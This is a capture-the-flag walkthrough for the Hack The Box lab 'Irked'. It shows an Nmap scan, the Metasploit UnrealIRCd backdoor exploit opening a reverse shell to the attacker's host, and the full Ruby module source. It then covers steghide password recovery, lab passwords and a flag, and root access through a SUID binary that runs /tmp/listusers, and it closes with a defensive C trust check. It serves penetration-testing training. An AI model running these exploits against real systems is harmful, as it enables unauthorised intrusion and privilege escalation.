HTB – Irked

Today we are going to solve another CTF challenge, “Irked”. It is a retired vulnerable lab from Hack The Box, which helps pentesters practise online penetration testing at their own experience level; the platform has a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy

Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have a static IP. The IP of Irked is 10.10.10.117.

Scanning

Let’s start off with our basic Nmap command to find out the open ports and services.

root@kali:~/htb# nmap -p- -sV 10.10.10.117 --open
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-04 05:49 EDT
Nmap scan report for 10.10.10.117
Host is up (0.027s latency).
Not shown: 65427 closed ports, 101 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
34772/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.89 seconds

Enumeration

I tried to extract hidden information from irked.jpg with steghide, but it needs a passphrase, which we still have to find.

root@kali:~/htb# steghide extract -sf irked.jpg
Enter passphrase:

Exploiting

Fortunately, I found an exploit for UnrealIRCd in Metasploit. The module's default port is 6667, but the service runs on 6697 here, so RPORT has to be set accordingly. I pwned the victim machine successfully after running the module.

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 10.10.14.5:4444 
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo jt9flkHuSYLifEoc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "jt9flkHuSYLifEoc\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.5:4444 -> 10.10.10.117:34526) at 2019-09-04 05:07:52 -0400

python -c 'import pty;pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ cd /home
cd /home
ircd@irked:/home$ 
ircd@irked:/home$ ls
ls
djmardov ircd
ircd@irked:/home$ 
ircd@irked:/home$ cd djmardov/Documents
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
ircd@irked:/home/djmardov/Documents$ 
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

root@kali:~/htb# curl http://10.10.10.117
<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>
root@kali:~/htb# curl http://10.10.10.117/irked.jpg -o irked.jpg
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 34697 100 34697 0 0 491k 0 --:--:-- --:--:-- --:--:-- 491k
root@kali:~/htb# steghide extract -sf irked.jpg
Enter passphrase: UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
root@kali:~/htb# cat pass.txt
Kab6h+m+bbp2J:HG

I found another password inside the pass.txt file: Kab6h+m+bbp2J:HG

Without Metasploit:

Nmap also gave me the name of the IRC server, UnrealIRCd. searchsploit shows there are exploits if the version is 3.2.8.1:

root@kali:~/htb# searchsploit UnrealIRCd
---------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~/htb# searchsploit -m exploits/linux/remote/16922.rb
Exploit: UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/16922/
Path: /usr/share/exploitdb/exploits/linux/remote/16922.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /root/htb/16922.rb

root@kali:~/htb# cat 16922.rb 
##
# $Id: unreal_ircd_3281_backdoor.rb 11227 2010-12-05 15:08:22Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
			'Description'    => %q{
					This module exploits a malicious backdoor that was added to the
				Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
				Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11227 $',
			'References'     =>
				[
					[ 'CVE', '2010-2075' ],
					[ 'OSVDB', '65445' ],
					[ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 12 2010'))

		register_options(
			[
				Opt::RPORT(6667)
			], self.class)
	end

	def exploit
		connect

		print_status("Connected to #{rhost}:#{rport}...")
		banner = sock.get_once(-1, 30)
		banner.to_s.split("\n").each do |line|
			print_line("    #{line}")
		end

		print_status("Sending backdoor command...")
		sock.put("AB;" + payload.encoded + "\n")

		handler
		disconnect
	end
end
root@kali:~/htb#

It looks like the exploit is to connect and then send “AB;” + the payload + “\n”.

Privilege Escalation

First, I open the user.txt file and finish the first challenge. Now let's dig deeper to find the root.txt file; for that we need to escalate privileges, so I look for any SUID binaries. Here /usr/bin/viewuser looks the most interesting, so let's check it out.

root@kali:~/htb# ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password: Kab6h+m+bbp2J:HG

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep  4 05:13:43 2019 from 10.10.14.5
djmardov@irked:~$ pwd
/home/djmardov
djmardov@irked:~$ cat Documents/user.txt 
4a66a78b12dc0e661a59d3f5c0267a8e
djmardov@irked:/$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
djmardov@irked:/$ ls -la /usr/bin/viewuser
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
djmardov@irked:/$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-09-04 05:05 (:0)
djmardov pts/1 2019-09-04 05:13 (10.10.14.5)
sh: 1: /tmp/listusers: not found
djmardov@irked:/$ echo '/bin/sh' > /tmp/listusers
djmardov@irked:/$ chmod 777 /tmp/listusers
djmardov@irked:/$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-09-04 05:05 (:0)
djmardov pts/1 2019-09-04 05:13 (10.10.14.5)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
# cd /root
# ls
pass.txt root.txt
# cat root.txt
8d8*****af3

So, when I ran the program, I saw that it is described as being developed to set and test user permissions, and that it failed because it could not find a listusers file in /tmp. The error message shows that the program runs /tmp/listusers through sh, and that file is missing from /tmp.

So what we can do is write a script that calls /bin/sh, save it as listusers inside /tmp, and then run viewuser so that it executes our script.

Now we have a root shell.
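The root cause is a SUID-root binary executing a helper from a world-writable directory. As an added example (not code from the box or from the writeup), this C check is what a privileged program should do before running a helper: verify that the file and its parent directory are owned by root (or by the privileged user itself) and not writable by group or other, and drop the SUID privilege before executing anything. The make_helper function only constructs sample inputs under /tmp for trying the check.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <libgen.h>
#include <sys/stat.h>

/* Trust check a SUID program should apply before executing a helper: absolute
 * path, regular file owned by root or by the privileged user, not writable by
 * group/other, and the parent directory held to the same rules (/tmp is 1777). */
int is_trusted_helper(const char *path)
{
    struct stat st;
    char buf[4096];
    uid_t ok = geteuid();                    /* 0 when running SUID root */
    if (path == NULL || path[0] != '/' || strlen(path) >= sizeof buf) return 0;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode)) return 0;
    if ((st.st_uid != 0 && st.st_uid != ok) || (st.st_mode & (S_IWGRP | S_IWOTH))) return 0;
    strcpy(buf, path);                       /* dirname() may modify its argument */
    if (stat(dirname(buf), &st) != 0) return 0;
    if ((st.st_uid != 0 && st.st_uid != ok) || (st.st_mode & (S_IWGRP | S_IWOTH))) return 0;
    return 1;
}

/* Hardened version of viewuser's last step: refuse untrusted helpers (-1) and
 * give up the SUID privilege before running anything. */
int run_helper_unprivileged(const char *path)
{
    if (!is_trusted_helper(path)) return -1;
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0) return -1;
    return system(path);
}

/* Constructed inputs: a helper in a private 0700 directory, and a 0777 file
 * directly in /tmp like the writeup's /tmp/listusers. NULL on failure. */
const char *make_helper(int world_writable)
{
    static char paths[2][80];
    char dir[32], *p = paths[world_writable ? 1 : 0];
    snprintf(dir, sizeof dir, "%s", world_writable ? "/tmp" : "/tmp/vu.XXXXXX");
    if (!world_writable && mkdtemp(dir) == NULL) return NULL;
    snprintf(p, 80, "%s/listusers.%ld", dir, (long)getpid());
    int fd = open(p, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0) return NULL; close(fd);
    chmod(p, world_writable ? 0777 : 0755);
    return p;
}
```

On the box, /tmp/listusers would fail both the mode check (0777) and the directory check (/tmp is 1777), so a hardened viewuser would never have executed it.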

Credits to hackingarticles.in

Author: Jacco Straathof
